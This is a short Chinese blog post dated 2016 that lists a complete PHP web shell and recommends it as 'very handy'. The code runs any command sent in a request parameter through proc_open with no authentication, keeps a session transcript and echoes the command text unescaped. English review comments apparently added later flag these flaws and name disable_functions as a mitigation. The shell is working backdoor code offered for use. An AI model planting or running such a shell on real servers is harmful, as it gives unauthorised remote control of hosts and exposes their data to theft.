[置顶] 改一个PHP WEB SHELL
2016-08-25 17:02
<?php
/*
 * Single-file PHP web shell: reads a `command` request parameter and runs it
 * on the server through proc_open(), keeping the transcript in $_SESSION.
 *
 * Review notes for anyone triaging this file on a host:
 *  - No authentication or authorisation check appears anywhere in this
 *    listing; every request that reaches the script is served with the
 *    privileges of the PHP process.
 *  - No session_start() call is visible here, so whether $_SESSION persists
 *    between requests depends on configuration outside this file
 *    (e.g. session.auto_start) -- confirm.
 *  - ereg(), the `$str{0}` offset syntax and the `safe_mode` ini setting used
 *    below are PHP 5-era features (ereg() was removed in PHP 7.0, curly-brace
 *    offsets in PHP 8.0), which dates the code and the runtimes it targets.
 *  - proc_open() is the only process-spawning call in the file, so listing it
 *    in php.ini `disable_functions` closes this execution path; a web-server
 *    or PHP worker process spawning child processes is the host-side signal.
 */
define("WINDOWS",1) ;

/**
 * Convert GBK-encoded text to UTF-8.
 *
 * The conversion only happens when $text is non-empty and iconv() exists;
 * otherwise the argument is returned unchanged.
 *
 * @param string|null $text Text to convert.
 * @return mixed Result of iconv(), or $text itself when no conversion ran.
 */
function GBK2UTF8($text=null){
    if (!empty($text) && function_exists('iconv')){
        return iconv("GBK", "UTF-8", $text);
    }
    return $text ;
}

/**
 * Trim a string and collapse blank lines in it.
 *
 * @param string $str Text to clean up.
 * @return string '' when $str is falsy, otherwise the trimmed text with each
 *                match of the blank-line pattern replaced by a single "\n".
 */
function remove_blanklines($str){
    return $str ? preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", trim($str)): '' ;
}

/**
 * Request handler: keeps working directory, command history and accumulated
 * output in $_SESSION and executes whatever arrives in the `command` parameter.
 */
class Webshell {
    // Only populated by __init__(); stays null on requests where the session
    // already carries a 'cwd', although _exec() still reads it for a bare `cd`.
    private $default_settings = null ;

    /**
     * Reset the session state (cwd, history, output).
     *
     * Despite the name this is not PHP's constructor (`__construct`); it runs
     * only when run() calls it explicitly.
     */
    function __init__(){
        $this->default_settings = array('home-directory' => '.');
        $_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
        $_SESSION['history'] = array();
        $_SESSION['output'] = '';
    }

    /**
     * Entry point for one HTTP request.
     *
     * Initialises the session state when no 'cwd' is stored, then hands the
     * trimmed `command` request parameter to _exec(). $_REQUEST is read
     * directly, with no check on who sent the request or what the value holds.
     */
    function run(){
        if (empty($_SESSION['cwd'])) {
            $this->__init__();
        }
        $command = $_REQUEST['command'] ;
        if (!empty($command)){
            $command = trim($command);
            $this->_exec($command);
        }
    }

    /**
     * Record a command, run it, and print the whole session transcript.
     *
     * `cd` is emulated by rewriting $_SESSION['cwd']; every other command is
     * passed unmodified to proc_open().
     *
     * @param string $command Command text exactly as received from the request.
     */
    function _exec($command){
        if (!empty($command)) {
            // Move the command to the front of the history, dropping an
            // earlier identical entry if there is one.
            if (($i = array_search($command, $_SESSION['history'])) !== false)
                unset($_SESSION['history'][$i]);
            array_unshift($_SESSION['history'], $command);
            // The raw command text is appended to the transcript without
            // htmlspecialchars(), unlike the process output further down, so
            // markup in the request parameter reaches the echo at the end of
            // this method unescaped.
            $_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ;

            /* Bare `cd`: go back to the configured home directory. */
            if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
                $_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
            } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
                /* `cd` with an argument that contains no ';' is handled here
                 * as an internal shell command. */
                if ($regs[1]{0} == '/') {
                    /* Absolute path, we use it unchanged. */
                    $new_dir = $regs[1];
                } else {
                    /* Relative path, we append it to the current working
                     * directory. */
                    $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
                }
                /* Transform '/./' into '/' */
                while (strpos($new_dir, '/./') !== false)
                    $new_dir = str_replace('/./', '/', $new_dir);
                /* Transform '//' into '/' */
                while (strpos($new_dir, '//') !== false)
                    $new_dir = str_replace('//', '/', $new_dir);
                /* Transform 'x/..' into '' */
                while (preg_match('|/\.\.(?!\.)|', $new_dir))
                    $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
                if ($new_dir == '')
                    $new_dir = '/';
                /* Try to change directory; '@' hides the warning on failure
                 * and the error is reported in the transcript instead. */
                if (@chdir($new_dir)) {
                    $_SESSION['cwd'] = $new_dir;
                } else {
                    $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
                }
            } else {
                // We cannot use putenv() in safe mode.
                if (!ini_get('safe_mode')) {
                    // Advise programs (ls for example) of the terminal size.
                    putenv('ROWS=' . 80);
                    putenv('COLUMNS=' . 600);
                }
                $shell_result = '' ;
                $io = array();
                // Request-supplied text becomes the command line of a child
                // process, started in the session's working directory with
                // stdout and stderr captured through pipes.
                $p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']);
                /* Read output sent to stdout (HTML-escaped line by line). */
                while (!feof($io[1])) {
                    $shell_result .= htmlspecialchars(fgets($io[1]));
                }
                /* Read output sent to stderr (HTML-escaped line by line). */
                while (!feof($io[2])) {
                    $shell_result .= htmlspecialchars(fgets($io[2]));
                }
                fclose($io[1]);
                fclose($io[2]);
                proc_close($p);
                // WINDOWS is hard-coded to 1 at the top of the file, so the
                // GBK -> UTF-8 branch is always the one taken.
                $shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result;
                $shell_result = remove_blanklines($shell_result);
                $_SESSION['output'] .= $shell_result;
            }
        }
        /* Build the command history for use in the JavaScript.
         * $js_command_hist is never read again in this listing. */
        if (empty($_SESSION['history'])) {
            $js_command_hist = '""';
        } else {
            $escaped = array_map('addslashes', $_SESSION['history']);
            $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
        }
        // The full accumulated transcript is sent back on every request.
        echo "<PRE>{$_SESSION['output']}</PRE>" ;
    }
}

// Module-level side effect: merely requesting this file runs the handler.
$inst = new Webshell();
$inst->run();
很好用